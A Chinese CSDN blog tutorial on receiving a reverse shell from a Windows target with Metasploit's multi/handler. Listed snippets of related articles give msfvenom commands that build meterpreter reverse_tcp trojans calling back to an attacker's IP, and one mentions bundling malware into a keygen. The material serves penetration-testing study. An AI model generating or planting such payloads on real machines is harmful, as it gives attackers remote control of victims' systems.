使用MSF反向反弹shell

最新推荐文章于 2024-05-30 15:16:41 发布
最新推荐文章于 2024-05-30 15:16:41 发布
阅读量4.6k 收藏 22
点赞数 4
分类专栏: 内网渗透 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45588247/article/details/107470393
版权

实验准备:

攻击(攻击者)主机:         

kali 2020.2  虚拟机    

   nat            

 192.168.254.132                            

反向反弹:

【步骤一】:msfconsole启动,结果如【图1】所示:

【命令】

msfconsole

一、msfconsole(这种没有启用数据库,搜索某些东西会很慢)

二、数据库启用(相当于于使用了msfconsole,又把数据库启用了)

图1

【步骤二】:msfconsole功能介绍,结果如【图2】所示:

【命令】

use exploit/multi/handler
show options

图2

【步骤三】:将lbb.exe木马放到目标主机进行执行,结果如【图3】所示:

图3

【分析】从上图返回结果可知,成功反弹高级shell

【步骤四】:通过反弹的高级shell对目标主机执行一些命令,结果如【图4】所示:

图4

【分析】通过上图可以看出,反弹的shell可以执行一些高级的系统命令

剑客 getshell
关注
  • 4
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msf反弹shell
weixin_34179762的博客
05-15 974
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
利用msf实现反弹shell与提权(细节过程秒懂)
Naiisii的博客
01-13 6042
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
【网络安全--反弹shell】注册机捆绑恶意程序上线MSF
最新发布
m0_67844671的博客
05-30 275
【网络安全--反弹shell】注册机捆绑恶意程序上线MSF 声明:郑重声明,本篇博客仅供学习与参考,若学习的内容用的不当,所产生的后果自负!!
内网的MSF接收反向shell
m0_46736332的博客
10-27 2964
内网虚拟机MSF接收外网以及不同局域网机器的反向shell
云服务器msf跨域反弹shell
iuyoo的博客
03-29 5973
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
利用msf在windows下反弹shell
Jiajiajiang_的博客
08-08 7102
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6843
生成木马进行植入
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 5794
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
mariadb php无法连接_weevely生成木马反向连接msf
weixin_39616090的博客
11-23 395
一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚小实验目的今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。实验环境VM搭建的虚拟测试环境1.phpstudy搭建主机 192.168.1.12.kali 192.168.1.128Weevely...
使用msf进行反弹shell+内网渗透
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3048
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
内网渗透-常用反弹shell方法总结
lza20001103的博客
04-15 2099
内网渗透-常用反弹shell方法总结
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
kali 反弹shell 远程操作Windows
天码行空的码的博客
05-31 2709
一、在kali终端执行下面命令,生成木马。 反向链接有多种协议: payload:/windows/meterpreter/reverse_http payload:/windows/meterpreter/reverse_https msfvenom -p windows/meterpreter/reverse_tcp LHOST=...
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1527
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
msf生成反弹shell
08-28
你可以使用Metasploit Framework (MSF)来生成一个反弹shell。这里有一个示例,展示如何使用MSF生成一个反弹到攻击者机器的shell: 1. 首先,启动Metasploit Framework控制台。在终端中输入 `msfconsole` 并按下回车...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值